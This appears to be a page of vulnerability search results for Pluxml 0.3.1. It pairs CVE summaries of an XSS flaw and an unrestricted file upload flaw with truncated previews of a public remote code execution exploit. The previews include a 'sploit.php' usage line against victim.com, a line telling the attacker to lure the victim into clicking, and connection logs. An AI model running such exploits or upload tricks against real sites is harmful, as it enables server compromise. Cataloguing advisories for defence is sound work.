9 matches found
EUVD-2007-3417
Malware in sbrugna...
Pluxml 0.3.1 - Remote Code Execution Exploit
No description provided by source. ?php C:\ sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 /Waiting for connection on http://90.27.10.196:80/ !Now you have to make the victim to click on the url +Received 395 bytes from 182.26.54.2:2007 +Sending 366 bytes to 182.26.54.2:2007...
Pluxml 0.3.1 Remote Code Execution Exploit
No description provided by source. ?php This file require the PhpSploit class. If you want to use this class, the latest version can be downloaded from acid-root.new.fr. Note: The new version is compatible with PHP 4 by default. errorreportingEALL ^ ENOTICE; require'phpsploitclass.php'; C:...
CVE-2007-3542
Removed by vendor...
CVE-2007-3542
CVE-2007-3542 is a cross-site scripting (XSS) vulnerability in Pluxml 0.3.1, located in admin/auth.php, exploitable by supplying a crafted msg parameter. The NVD entry lists a MEDIUM risk (CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N, base score 4.3) with no authentication required and no impact on confide...
Unrestricted file upload
Unrestricted file upload vulnerability in admin/images.php in Pluxml 0.3.1 allows remote attackers to upload and execute arbitrary PHP code via a .jpg filename...
CVE-2007-3432
Unrestricted file upload vulnerability in admin/images.php in Pluxml 0.3.1 allows remote attackers to upload and execute arbitrary PHP code via a .jpg filename...
CVE-2007-3432
CVE-2007-3432 is an actual vulnerability in Pluxml 0.3.1 where an unrestricted file upload in admin/images.php allows remote attackers to upload and execute arbitrary PHP code by using a .jpg filename. The NGDV/NVD entry confirms the impact as partial confidentiality, integrity, and availability ...
pluxml031-exec.txt
sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 /Waiting for connection on http://90.27.10.196:80/ !Now you have to make the victim to click on the url +Received 395 bytes from 182.26.54.2:2007 +Sending 366 bytes to 182.26.54.2:2007 +Received 326 bytes from 182.26.54.2:2009 +Sendi...